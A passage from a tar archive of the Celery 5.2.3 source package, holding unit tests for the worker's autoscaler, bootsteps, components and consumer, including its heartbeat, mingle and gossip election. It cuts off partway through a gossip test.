cached_property(fun) assert x.__get__(None) is x assert x.__set__(None, None) is x assert x.__delete__(None) is x ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8637578 celery-5.2.3/t/unit/worker/0000775000175000017500000000000000000000000015430 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/__init__.py0000664000175000017500000000000000000000000017527 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_autoscale.py0000664000175000017500000001661700000000000021034 0ustar00asifasif00000000000000import sys from time import monotonic from unittest.mock import Mock, patch import pytest from celery.concurrency.base import BasePool from celery.utils.objects import Bunch from celery.worker import autoscale, state class MockPool(BasePool): shrink_raises_exception = False shrink_raises_ValueError = False def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._pool = Bunch(_processes=self.limit) def grow(self, n=1): self._pool._processes += n def shrink(self, n=1): if self.shrink_raises_exception: raise KeyError('foo') if self.shrink_raises_ValueError: raise ValueError('foo') self._pool._processes -= n @property def num_processes(self): return self._pool._processes class test_WorkerComponent: def test_register_with_event_loop(self): parent = Mock(name='parent') parent.autoscale = True parent.consumer.on_task_message = set() w = autoscale.WorkerComponent(parent) assert parent.autoscaler is None assert w.enabled hub = Mock(name='hub') w.create(parent) w.register_with_event_loop(parent, hub) assert (parent.autoscaler.maybe_scale in parent.consumer.on_task_message) hub.call_repeatedly.assert_called_with( parent.autoscaler.keepalive, parent.autoscaler.maybe_scale, ) parent.hub = hub hub.on_init = [] w.instantiate = Mock() w.register_with_event_loop(parent, Mock(name='loop')) assert parent.consumer.on_task_message def test_info_without_event_loop(self): parent = Mock(name='parent') parent.autoscale = True parent.max_concurrency = '10' parent.min_concurrency = '2' parent.use_eventloop = False w = autoscale.WorkerComponent(parent) w.create(parent) info = w.info(parent) assert 'autoscaler' in info assert parent.autoscaler_cls().info.called class test_Autoscaler: def setup(self): self.pool = MockPool(3) def test_stop(self): class Scaler(autoscale.Autoscaler): alive = True joined = False def is_alive(self): return self.alive def join(self, timeout=None): self.joined = True worker = Mock(name='worker') x = Scaler(self.pool, 10, 3, worker=worker) # Don't allow thread joining or event waiting to block the test with patch("threading.Thread.join"), patch("threading.Event.wait"): x.stop() assert x.joined x.joined = False x.alive = False with patch("threading.Thread.join"), patch("threading.Event.wait"): x.stop() assert not x.joined @pytest.mark.sleepdeprived_patched_module(autoscale) def test_body(self, sleepdeprived): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.body() assert x.pool.num_processes == 3 _keep = [Mock(name=f'req{i}') for i in range(20)] [state.task_reserved(m) for m in _keep] x.body() x.body() assert x.pool.num_processes == 10 state.reserved_requests.clear() x.body() assert x.pool.num_processes == 10 x._last_scale_up = monotonic() - 10000 x.body() assert x.pool.num_processes == 3 def test_run(self): class Scaler(autoscale.Autoscaler): scale_called = False def body(self): self.scale_called = True getattr(self, "_bgThread__is_shutdown").set() worker = Mock(name='worker') x = Scaler(self.pool, 10, 3, worker=worker) x.run() assert getattr(x, "_bgThread__is_shutdown").is_set() assert getattr(x, "_bgThread__is_stopped").is_set() assert x.scale_called def test_shrink_raises_exception(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.scale_up(3) x.pool.shrink_raises_exception = True x._shrink(1) @patch('celery.worker.autoscale.debug') def test_shrink_raises_ValueError(self, debug): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.scale_up(3) x._last_scale_up = monotonic() - 10000 x.pool.shrink_raises_ValueError = True x.scale_down(1) assert debug.call_count def test_update(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.worker.consumer.prefetch_multiplier = 1 x.keepalive = -1 assert x.processes == 3 x.scale_up(5) x.update(7, None) assert x.processes == 7 assert x.max_concurrency == 7 x.scale_down(4) x.update(None, 6) assert x.processes == 6 assert x.min_concurrency == 6 x.update(max=300, min=10) x.update(max=300, min=2) x.update(max=None, min=None) def test_prefetch_count_on_updates(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.worker.consumer.prefetch_multiplier = 1 x.update(5, None) worker.consumer._update_prefetch_count.assert_called_with(-5) x.update(15, 7) worker.consumer._update_prefetch_count.assert_called_with(10) def test_prefetch_count_on_updates_prefetch_multiplier_gt_one(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.worker.consumer.prefetch_multiplier = 4 x.update(5, None) worker.consumer._update_prefetch_count.assert_called_with(-5) x.update(15, 7) worker.consumer._update_prefetch_count.assert_called_with(10) def test_info(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) info = x.info() assert info['max'] == 10 assert info['min'] == 3 assert info['current'] == 3 @patch('os._exit') def test_thread_crash(self, _exit): class _Autoscaler(autoscale.Autoscaler): def body(self): getattr(self, "_bgThread__is_shutdown").set() raise OSError('foo') worker = Mock(name='worker') x = _Autoscaler(self.pool, 10, 3, worker=worker) stderr = Mock() p, sys.stderr = sys.stderr, stderr try: x.run() finally: sys.stderr = p _exit.assert_called_with(1) stderr.write.assert_called() @pytest.mark.sleepdeprived_patched_module(autoscale) def test_no_negative_scale(self, sleepdeprived): total_num_processes = [] worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.body() # the body func scales up or down _keep = [Mock(name=f'req{i}') for i in range(35)] for req in _keep: state.task_reserved(req) x.body() total_num_processes.append(self.pool.num_processes) for req in _keep: state.task_ready(req) x.body() total_num_processes.append(self.pool.num_processes) assert all(x.min_concurrency <= i <= x.max_concurrency for i in total_num_processes) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_bootsteps.py0000664000175000017500000002227100000000000021067 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest from celery import bootsteps class test_StepFormatter: def test_get_prefix(self): f = bootsteps.StepFormatter() s = Mock() s.last = True assert f._get_prefix(s) == f.blueprint_prefix s2 = Mock() s2.last = False s2.conditional = True assert f._get_prefix(s2) == f.conditional_prefix s3 = Mock() s3.last = s3.conditional = False assert f._get_prefix(s3) == '' def test_node(self): f = bootsteps.StepFormatter() f.draw_node = Mock() step = Mock() step.last = False f.node(step, x=3) f.draw_node.assert_called_with(step, f.node_scheme, {'x': 3}) step.last = True f.node(step, x=3) f.draw_node.assert_called_with(step, f.blueprint_scheme, {'x': 3}) def test_edge(self): f = bootsteps.StepFormatter() f.draw_edge = Mock() a, b = Mock(), Mock() a.last = True f.edge(a, b, x=6) f.draw_edge.assert_called_with(a, b, f.edge_scheme, { 'x': 6, 'arrowhead': 'none', 'color': 'darkseagreen3', }) a.last = False f.edge(a, b, x=6) f.draw_edge.assert_called_with(a, b, f.edge_scheme, { 'x': 6, }) class test_Step: class Def(bootsteps.StartStopStep): name = 'test_Step.Def' def setup(self): self.steps = [] def test_blueprint_name(self, bp='test_blueprint_name'): class X(bootsteps.Step): blueprint = bp name = 'X' assert X.name == 'X' class Y(bootsteps.Step): name = '%s.Y' % bp assert Y.name == f'{bp}.Y' def test_init(self): assert self.Def(self) def test_create(self): self.Def(self).create(self) def test_include_if(self): x = self.Def(self) x.enabled = True assert x.include_if(self) x.enabled = False assert not x.include_if(self) def test_instantiate(self): assert isinstance( self.Def(self).instantiate(self.Def, self), self.Def, ) def test_include_when_enabled(self): x = self.Def(self) x.create = Mock() x.create.return_value = 'George' assert x.include(self) assert x.obj == 'George' x.create.assert_called_with(self) def test_include_when_disabled(self): x = self.Def(self) x.enabled = False x.create = Mock() assert not x.include(self) x.create.assert_not_called() def test_repr(self): x = self.Def(self) assert repr(x) class test_ConsumerStep: def test_interface(self): step = bootsteps.ConsumerStep(self) with pytest.raises(NotImplementedError): step.get_consumers(self) def test_start_stop_shutdown(self): consumer = Mock() self.connection = Mock() class Step(bootsteps.ConsumerStep): def get_consumers(self, c): return [consumer] step = Step(self) assert step.get_consumers(self) == [consumer] step.start(self) consumer.consume.assert_called_with() step.stop(self) consumer.cancel.assert_called_with() step.shutdown(self) consumer.channel.close.assert_called_with() def test_start_no_consumers(self): self.connection = Mock() class Step(bootsteps.ConsumerStep): def get_consumers(self, c): return () step = Step(self) step.start(self) def test_close_no_consumer_channel(self): step = bootsteps.ConsumerStep(Mock()) step.consumers = [Mock()] step.consumers[0].channel = None step._close(Mock()) class test_StartStopStep: class Def(bootsteps.StartStopStep): name = 'test_StartStopStep.Def' def setup(self): self.steps = [] def test_start__stop(self): x = self.Def(self) x.create = Mock() # include creates the underlying object and sets # its x.obj attribute to it, as well as appending # it to the parent.steps list. x.include(self) assert self.steps assert self.steps[0] is x x.start(self) x.obj.start.assert_called_with() x.stop(self) x.obj.stop.assert_called_with() x.obj = None assert x.start(self) is None def test_terminate__no_obj(self): x = self.Def(self) x.obj = None x.terminate(Mock()) def test_include_when_disabled(self): x = self.Def(self) x.enabled = False x.include(self) assert not self.steps def test_terminate(self): x = self.Def(self) x.create = Mock() x.include(self) delattr(x.obj, 'terminate') x.terminate(self) x.obj.stop.assert_called_with() class test_Blueprint: class Blueprint(bootsteps.Blueprint): name = 'test_Blueprint' def test_steps_added_to_unclaimed(self): class tnA(bootsteps.Step): name = 'test_Blueprint.A' class tnB(bootsteps.Step): name = 'test_Blueprint.B' class xxA(bootsteps.Step): name = 'xx.A' class Blueprint(self.Blueprint): default_steps = [tnA, tnB] blueprint = Blueprint() assert tnA in blueprint.types assert tnB in blueprint.types assert xxA not in blueprint.types def test_init(self): blueprint = self.Blueprint() assert blueprint.name == 'test_Blueprint' def test_close__on_close_is_None(self): blueprint = self.Blueprint() blueprint.on_close = None blueprint.send_all = Mock() blueprint.close(1) blueprint.send_all.assert_called_with( 1, 'close', 'closing', reverse=False, ) def test_send_all_with_None_steps(self): parent = Mock() blueprint = self.Blueprint() parent.steps = [None, None, None] blueprint.send_all(parent, 'close', 'Closing', reverse=False) def test_send_all_raises(self): parent = Mock() blueprint = self.Blueprint() parent.steps = [Mock()] parent.steps[0].foo.side_effect = KeyError() blueprint.send_all(parent, 'foo', propagate=False) with pytest.raises(KeyError): blueprint.send_all(parent, 'foo', propagate=True) def test_stop_state_in_TERMINATE(self): blueprint = self.Blueprint() blueprint.state = bootsteps.TERMINATE blueprint.stop(Mock()) def test_join_raises_IGNORE_ERRORS(self): prev, bootsteps.IGNORE_ERRORS = bootsteps.IGNORE_ERRORS, (KeyError,) try: blueprint = self.Blueprint() blueprint.shutdown_complete = Mock() blueprint.shutdown_complete.wait.side_effect = KeyError('luke') blueprint.join(timeout=10) blueprint.shutdown_complete.wait.assert_called_with(timeout=10) finally: bootsteps.IGNORE_ERRORS = prev def test_connect_with(self): class b1s1(bootsteps.Step): pass class b1s2(bootsteps.Step): last = True class b2s1(bootsteps.Step): pass class b2s2(bootsteps.Step): last = True b1 = self.Blueprint([b1s1, b1s2]) b2 = self.Blueprint([b2s1, b2s2]) b1.apply(Mock()) b2.apply(Mock()) b1.connect_with(b2) assert b1s1 in b1.graph assert b2s1 in b1.graph assert b2s2 in b1.graph assert repr(b1s1) assert str(b1s1) def test_topsort_raises_KeyError(self): class Step(bootsteps.Step): requires = ('xyxxx.fsdasewe.Unknown',) b = self.Blueprint([Step]) b.steps = b.claim_steps() with pytest.raises(ImportError): b._finalize_steps(b.steps) Step.requires = () b.steps = b.claim_steps() b._finalize_steps(b.steps) with patch('celery.bootsteps.DependencyGraph') as Dep: g = Dep.return_value = Mock() g.topsort.side_effect = KeyError('foo') with pytest.raises(KeyError): b._finalize_steps(b.steps) def test_apply(self): class MyBlueprint(bootsteps.Blueprint): name = 'test_apply' def modules(self): return ['A', 'B'] class B(bootsteps.Step): name = 'test_apply.B' class C(bootsteps.Step): name = 'test_apply.C' requires = [B] class A(bootsteps.Step): name = 'test_apply.A' requires = [C] class D(bootsteps.Step): name = 'test_apply.D' last = True x = MyBlueprint([A, D]) x.apply(self) assert isinstance(x.order[0], B) assert isinstance(x.order[1], C) assert isinstance(x.order[2], A) assert isinstance(x.order[3], D) assert A in x.types assert x[A.name] is x.order[2] def test_find_last_but_no_steps(self): class MyBlueprint(bootsteps.Blueprint): name = 'qwejwioqjewoqiej' x = MyBlueprint() x.apply(self) assert x._find_last() is None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_components.py0000664000175000017500000000462600000000000021236 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest import t.skip from celery.exceptions import ImproperlyConfigured from celery.worker.components import Beat, Hub, Pool, Timer # some of these are tested in test_worker, so I've only written tests # here to complete coverage. Should move everything to this module at some # point [-ask] class test_Timer: def test_create__eventloop(self): w = Mock(name='w') w.use_eventloop = True Timer(w).create(w) assert not w.timer.queue class test_Hub: def setup(self): self.w = Mock(name='w') self.hub = Hub(self.w) self.w.hub = Mock(name='w.hub') @patch('celery.worker.components.set_event_loop') @patch('celery.worker.components.get_event_loop') def test_create(self, get_event_loop, set_event_loop): self.hub._patch_thread_primitives = Mock(name='ptp') assert self.hub.create(self.w) is self.hub self.hub._patch_thread_primitives.assert_called_with(self.w) def test_start(self): self.hub.start(self.w) def test_stop(self): self.hub.stop(self.w) self.w.hub.close.assert_called_with() def test_terminate(self): self.hub.terminate(self.w) self.w.hub.close.assert_called_with() class test_Pool: def test_close_terminate(self): w = Mock() comp = Pool(w) pool = w.pool = Mock() comp.close(w) pool.close.assert_called_with() comp.terminate(w) pool.terminate.assert_called_with() w.pool = None comp.close(w) comp.terminate(w) @t.skip.if_win32 def test_create_when_eventloop(self): w = Mock() w.use_eventloop = w.pool_putlocks = w.pool_cls.uses_semaphore = True comp = Pool(w) w.pool = Mock() comp.create(w) assert w.process_task is w._process_task_sem def test_create_calls_instantiate_with_max_memory(self): w = Mock() w.use_eventloop = w.pool_putlocks = w.pool_cls.uses_semaphore = True comp = Pool(w) comp.instantiate = Mock() w.max_memory_per_child = 32 comp.create(w) assert comp.instantiate.call_args[1]['max_memory_per_child'] == 32 class test_Beat: def test_create__green(self): w = Mock(name='w') w.pool_cls.__module__ = 'foo_gevent' with pytest.raises(ImproperlyConfigured): Beat(w).create(w) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_consumer.py0000664000175000017500000005475000000000000020707 0ustar00asifasif00000000000000import errno import socket from collections import deque from unittest.mock import Mock, call, patch import pytest from billiard.exceptions import RestartFreqExceeded from celery.contrib.testing.mocks import ContextMock from celery.utils.collections import LimitedSet from celery.worker.consumer.agent import Agent from celery.worker.consumer.consumer import (CANCEL_TASKS_BY_DEFAULT, CLOSE, TERMINATE, Consumer) from celery.worker.consumer.gossip import Gossip from celery.worker.consumer.heart import Heart from celery.worker.consumer.mingle import Mingle from celery.worker.consumer.tasks import Tasks from celery.worker.state import active_requests class test_Consumer: def get_consumer(self, no_hub=False, **kwargs): consumer = Consumer( on_task_request=Mock(), init_callback=Mock(), pool=Mock(), app=self.app, timer=Mock(), controller=Mock(), hub=None if no_hub else Mock(), **kwargs ) consumer.blueprint = Mock(name='blueprint') consumer._restart_state = Mock(name='_restart_state') consumer.connection = _amqp_connection() consumer.connection_errors = (socket.error, OSError,) consumer.conninfo = consumer.connection return consumer def test_repr(self): assert repr(self.get_consumer()) def test_taskbuckets_defaultdict(self): c = self.get_consumer() assert c.task_buckets['fooxasdwx.wewe'] is None def test_sets_heartbeat(self): c = self.get_consumer(amqheartbeat=10) assert c.amqheartbeat == 10 self.app.conf.broker_heartbeat = 20 c = self.get_consumer(amqheartbeat=None) assert c.amqheartbeat == 20 def test_gevent_bug_disables_connection_timeout(self): with patch('celery.worker.consumer.consumer._detect_environment') as d: d.return_value = 'gevent' self.app.conf.broker_connection_timeout = 33.33 self.get_consumer() assert self.app.conf.broker_connection_timeout is None def test_limit_moved_to_pool(self): with patch('celery.worker.consumer.consumer.task_reserved') as reserv: c = self.get_consumer() c.on_task_request = Mock(name='on_task_request') request = Mock(name='request') c._limit_move_to_pool(request) reserv.assert_called_with(request) c.on_task_request.assert_called_with(request) def test_update_prefetch_count(self): c = self.get_consumer() c._update_qos_eventually = Mock(name='update_qos') c.initial_prefetch_count = None c.pool.num_processes = None c.prefetch_multiplier = 10 assert c._update_prefetch_count(1) is None c.initial_prefetch_count = 10 c.pool.num_processes = 10 c._update_prefetch_count(8) c._update_qos_eventually.assert_called_with(8) assert c.initial_prefetch_count == 10 * 10 def test_flush_events(self): c = self.get_consumer() c.event_dispatcher = None c._flush_events() c.event_dispatcher = Mock(name='evd') c._flush_events() c.event_dispatcher.flush.assert_called_with() def test_on_send_event_buffered(self): c = self.get_consumer() c.hub = None c.on_send_event_buffered() c.hub = Mock(name='hub') c.on_send_event_buffered() c.hub._ready.add.assert_called_with(c._flush_events) def test_schedule_bucket_request(self): c = self.get_consumer() c.timer = Mock() bucket = Mock() request = Mock() bucket.pop = lambda: bucket.contents.popleft() bucket.can_consume.return_value = True bucket.contents = deque() with patch( 'celery.worker.consumer.consumer.Consumer._limit_move_to_pool' ) as reserv: bucket.contents.append((request, 3)) c._schedule_bucket_request(bucket) bucket.can_consume.assert_called_with(3) reserv.assert_called_with(request) bucket.can_consume.return_value = False bucket.contents = deque() bucket.expected_time.return_value = 3.33 bucket.contents.append((request, 4)) limit_order = c._limit_order c._schedule_bucket_request(bucket) assert c._limit_order == limit_order + 1 bucket.can_consume.assert_called_with(4) c.timer.call_after.assert_called_with( 3.33, c._schedule_bucket_request, (bucket,), priority=c._limit_order, ) bucket.expected_time.assert_called_with(4) assert bucket.pop() == (request, 4) bucket.contents = deque() bucket.can_consume.reset_mock() c._schedule_bucket_request(bucket) bucket.can_consume.assert_not_called() def test_limit_task(self): c = self.get_consumer() bucket = Mock() request = Mock() with patch( 'celery.worker.consumer.consumer.Consumer._schedule_bucket_request' ) as reserv: c._limit_task(request, bucket, 1) bucket.add.assert_called_with((request, 1)) reserv.assert_called_with(bucket) def test_post_eta(self): c = self.get_consumer() c.qos = Mock() bucket = Mock() request = Mock() with patch( 'celery.worker.consumer.consumer.Consumer._schedule_bucket_request' ) as reserv: c._limit_post_eta(request, bucket, 1) c.qos.decrement_eventually.assert_called_with() bucket.add.assert_called_with((request, 1)) reserv.assert_called_with(bucket) def test_start_blueprint_raises_EMFILE(self): c = self.get_consumer() exc = c.blueprint.start.side_effect = OSError() exc.errno = errno.EMFILE with pytest.raises(OSError): c.start() def test_max_restarts_exceeded(self): c = self.get_consumer() def se(*args, **kwargs): c.blueprint.state = CLOSE raise RestartFreqExceeded() c._restart_state.step.side_effect = se c.blueprint.start.side_effect = socket.error() with patch('celery.worker.consumer.consumer.sleep') as sleep: c.start() sleep.assert_called_with(1) def test_do_not_restart_when_closed(self): c = self.get_consumer() c.blueprint.state = None def bp_start(*args, **kwargs): c.blueprint.state = CLOSE c.blueprint.start.side_effect = bp_start with patch('celery.worker.consumer.consumer.sleep'): c.start() c.blueprint.start.assert_called_once_with(c) def test_do_not_restart_when_terminated(self): c = self.get_consumer() c.blueprint.state = None def bp_start(*args, **kwargs): c.blueprint.state = TERMINATE c.blueprint.start.side_effect = bp_start with patch('celery.worker.consumer.consumer.sleep'): c.start() c.blueprint.start.assert_called_once_with(c) def test_no_retry_raises_error(self): self.app.conf.broker_connection_retry = False c = self.get_consumer() c.blueprint.start.side_effect = socket.error() with pytest.raises(socket.error): c.start() def _closer(self, c): def se(*args, **kwargs): c.blueprint.state = CLOSE return se def test_collects_at_restart(self): c = self.get_consumer() c.connection.collect.side_effect = MemoryError() c.blueprint.start.side_effect = socket.error() c.blueprint.restart.side_effect = self._closer(c) c.start() c.connection.collect.assert_called_with() def test_register_with_event_loop(self): c = self.get_consumer() c.register_with_event_loop(Mock(name='loop')) def test_on_close_clears_semaphore_timer_and_reqs(self): with patch('celery.worker.consumer.consumer.reserved_requests') as res: c = self.get_consumer() c.on_close() c.controller.semaphore.clear.assert_called_with() c.timer.clear.assert_called_with() res.clear.assert_called_with() c.pool.flush.assert_called_with() c.controller = None c.timer = None c.pool = None c.on_close() def test_connect_error_handler(self): self.app._connection = _amqp_connection() conn = self.app._connection.return_value c = self.get_consumer() assert c.connect() conn.ensure_connection.assert_called() errback = conn.ensure_connection.call_args[0][0] errback(Mock(), 0) @patch('celery.worker.consumer.consumer.error') def test_connect_error_handler_progress(self, error): self.app.conf.broker_connection_retry = True self.app.conf.broker_connection_max_retries = 3 self.app._connection = _amqp_connection() conn = self.app._connection.return_value c = self.get_consumer() assert c.connect() errback = conn.ensure_connection.call_args[0][0] errback(Mock(), 2) assert error.call_args[0][3] == 'Trying again in 2.00 seconds... (1/3)' errback(Mock(), 4) assert error.call_args[0][3] == 'Trying again in 4.00 seconds... (2/3)' errback(Mock(), 6) assert error.call_args[0][3] == 'Trying again in 6.00 seconds... (3/3)' def test_cancel_long_running_tasks_on_connection_loss(self): c = self.get_consumer() c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = True mock_request_acks_late_not_acknowledged = Mock() mock_request_acks_late_not_acknowledged.task.acks_late = True mock_request_acks_late_not_acknowledged.acknowledged = False mock_request_acks_late_acknowledged = Mock() mock_request_acks_late_acknowledged.task.acks_late = True mock_request_acks_late_acknowledged.acknowledged = True mock_request_acks_early = Mock() mock_request_acks_early.task.acks_late = False mock_request_acks_early.acknowledged = False active_requests.add(mock_request_acks_late_not_acknowledged) active_requests.add(mock_request_acks_late_acknowledged) active_requests.add(mock_request_acks_early) c.on_connection_error_after_connected(Mock()) mock_request_acks_late_not_acknowledged.cancel.assert_called_once_with(c.pool) mock_request_acks_late_acknowledged.cancel.assert_not_called() mock_request_acks_early.cancel.assert_not_called() active_requests.clear() def test_cancel_long_running_tasks_on_connection_loss__warning(self): c = self.get_consumer() c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = False with pytest.deprecated_call(match=CANCEL_TASKS_BY_DEFAULT): c.on_connection_error_after_connected(Mock()) class test_Heart: def test_start(self): c = Mock() c.timer = Mock() c.event_dispatcher = Mock() with patch('celery.worker.heartbeat.Heart') as hcls: h = Heart(c) assert h.enabled assert h.heartbeat_interval is None assert c.heart is None h.start(c) assert c.heart hcls.assert_called_with(c.timer, c.event_dispatcher, h.heartbeat_interval) c.heart.start.assert_called_with() def test_start_heartbeat_interval(self): c = Mock() c.timer = Mock() c.event_dispatcher = Mock() with patch('celery.worker.heartbeat.Heart') as hcls: h = Heart(c, False, 20) assert h.enabled assert h.heartbeat_interval == 20 assert c.heart is None h.start(c) assert c.heart hcls.assert_called_with(c.timer, c.event_dispatcher, h.heartbeat_interval) c.heart.start.assert_called_with() class test_Tasks: def test_stop(self): c = Mock() tasks = Tasks(c) assert c.task_consumer is None assert c.qos is None c.task_consumer = Mock() tasks.stop(c) def test_stop_already_stopped(self): c = Mock() tasks = Tasks(c) tasks.stop(c) class test_Agent: def test_start(self): c = Mock() agent = Agent(c) agent.instantiate = Mock() agent.agent_cls = 'foo:Agent' assert agent.create(c) is not None agent.instantiate.assert_called_with(agent.agent_cls, c.connection) class test_Mingle: def test_start_no_replies(self): c = Mock() c.app.connection_for_read = _amqp_connection() mingle = Mingle(c) I = c.app.control.inspect.return_value = Mock() I.hello.return_value = {} mingle.start(c) def test_start(self): c = Mock() c.app.connection_for_read = _amqp_connection() mingle = Mingle(c) assert mingle.enabled Aig = LimitedSet() Big = LimitedSet() Aig.add('Aig-1') Aig.add('Aig-2') Big.add('Big-1') I = c.app.control.inspect.return_value = Mock() I.hello.return_value = { 'A@example.com': { 'clock': 312, 'revoked': Aig._data, }, 'B@example.com': { 'clock': 29, 'revoked': Big._data, }, 'C@example.com': { 'error': 'unknown method', }, } our_revoked = c.controller.state.revoked = LimitedSet() mingle.start(c) I.hello.assert_called_with(c.hostname, our_revoked._data) c.app.clock.adjust.assert_has_calls([ call(312), call(29), ], any_order=True) assert 'Aig-1' in our_revoked assert 'Aig-2' in our_revoked assert 'Big-1' in our_revoked def _amqp_connection(): connection = ContextMock(name='Connection') connection.return_value = ContextMock(name='connection') connection.return_value.transport.driver_type = 'amqp' return connection class test_Gossip: def test_init(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) assert g.enabled assert c.gossip is g def test_callbacks(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) on_node_join = Mock(name='on_node_join') on_node_join2 = Mock(name='on_node_join2') on_node_leave = Mock(name='on_node_leave') on_node_lost = Mock(name='on.node_lost') g.on.node_join.add(on_node_join) g.on.node_join.add(on_node_join2) g.on.node_leave.add(on_node_leave) g.on.node_lost.add(on_node_lost) worker = Mock(name='worker') g.on_node_join(worker) on_node_join.assert_called_with(worker) on_node_join2.assert_called_with(worker) g.on_node_leave(worker) on_node_leave.assert_called_with(worker) g.on_node_lost(worker) on_node_lost.assert_called_with(worker) def test_election(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.start(c) g.election('id', 'topic', 'action') assert g.consensus_replies['id'] == [] g.dispatcher.send.assert_called_with( 'worker-elect', id='id', topic='topic', cver=1, action='action', ) def test_call_task(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.start(c) signature = g.app.signature = Mock(name='app.signature') task = Mock() g.call_task(task) signature.assert_called_with(task) signature.return_value.apply_async.assert_called_with() signature.return_value.apply_async.side_effect = MemoryError() with patch('celery.worker.consumer.gossip.logger') as logger: g.call_task(task) logger.exception.assert_called() def Event(self, id='id', clock=312, hostname='foo@example.com', pid=4312, topic='topic', action='action', cver=1): return { 'id': id, 'clock': clock, 'hostname': hostname, 'pid': pid, 'topic': topic, 'action': action, 'cver': cver, } def test_on_elect(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.start(c) event = self.Event('id1') g.on_elect(event) in_heap = g.consensus_requests['id1'] assert in_heap g.dispatcher.send.assert_called_with('worker-elect-ack', id='id1') event.pop('clock') with patch('celery.worker.consumer.gossip.logger') as logger: g.on_elect(event) logger.exception.assert_called() def Consumer(self, hostname='foo@x.com', pid=4312): c = Mock() c.app.connection = _amqp_connection() c.hostname = hostname c.pid = pid return c def setup_election(self, g, c): g.start(c) g.clock = self.app.clock assert 'idx' not in g.consensus_replies assert g.on_elect_ack({'id': 'idx'}) is None g.state.alive_workers.return_value = [ 'foo@x.com', 'bar@x.com', 'baz@x.com', ] g.consensus_replies['id1'] = [] g.consensus_requests['id1'] = [] e1 = self.Event('id1', 1, 'foo@x.com') e2 = self.Event('id1', 2, 'bar@x.com') e3 = self.Event('id1', 3, 'baz@x.com') g.on_elect(e1) g.on_elect(e2) g.on_elect(e3) assert len(g.consensus_requests['id1']) == 3 with patch('celery.worker.consumer.gossip.info'): g.on_elect_ack(e1) assert len(g.consensus_replies['id1']) == 1 g.on_elect_ack(e2) assert len(g.consensus_replies['id1']) == 2 g.on_elect_ack(e3) with pytest.raises(KeyError): g.consensus_replies['id1'] def test_on_elect_ack_win(self): c = self.Consumer(hostname='foo@x.com') # I will win c.app.connection_for_read = _amqp_connection() g = Gossip(c) handler = g.election_handlers['topic'] = Mock() self.setup_election(g, c) handler.assert_called_with('action') def test_on_elect_ack_lose(self): c = self.Consumer(hostname='bar@x.com') # I will lose c.app.connection_for_read = _amqp_connection() g = Gossip(c) handler = g.election_handlers['topic'] = Mock() self.setup_election(g, c) handler.assert_not_called() def test_on_elect_ack_win_but_no_action(self): c = self.Consumer(hostname='foo@x.com') # I will win c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.election_handlers = {} with patch('celery.worker.consumer.gossip.logger') as logger: self.setup_election(g, c) logger.exception.assert_called() def test_on_node_join(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) with patch('celery.worker.consumer.gossip.debug') as debug: g.on_node_join(c) debug.assert_called_with('%s joined the party', 'foo@x.com') def test_on_node_leave(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) with patch('celery.worker.consumer.gossip.debug') as debug: g.on_node_leave(c) debug.assert_called_with('%s left', 'foo@x.com') def test_on_node_lost(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) with patch('celery.worker.consumer.gossip.info') as info: g.on_node_lost(c) info.assert_called_with('missed heartbeat from %s', 'foo@x.com') def test_register_timer(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.register_timer() c.timer.call_repeatedly.assert_called_with(g.interval, g.periodic) tref = g._tref g.register_timer() tref.cancel.assert_called_with() def test_periodic(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) g.on_node_lost = Mock() state = g.state = Mock() worker = Mock() state.workers = {'foo': worker} worker.alive = True worker.hostname = 'foo' g.periodic() worker.alive = False g.periodic() g.on_node_lost.assert_called_with(worker) with pytest.raises(KeyError): state.workers['foo'] def test_on_message__task(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) assert g.enabled message = Mock(name='message') message.delivery_info = {'routing_key': 'task.failed'} g.on_message(Mock(name='prepare'), message) def test_on_message(self): c = self.Consumer() c.app.connection_for_read = _amqp_connection() g = Gossip(c) assert g.enabled prepare = Mock() prepare.return_value = 'worker-online', {} c.app.events.State.assert_called_with( on_node_join=g.on_node_join, on_node_leave=g.on_node_leave, max_tasks_in_memory=1, ) g.update_state = Mock() worker = Mock() g.on_node_join = Mock() g.on_node_leave = Mock() g.update_state.return_value = worker, 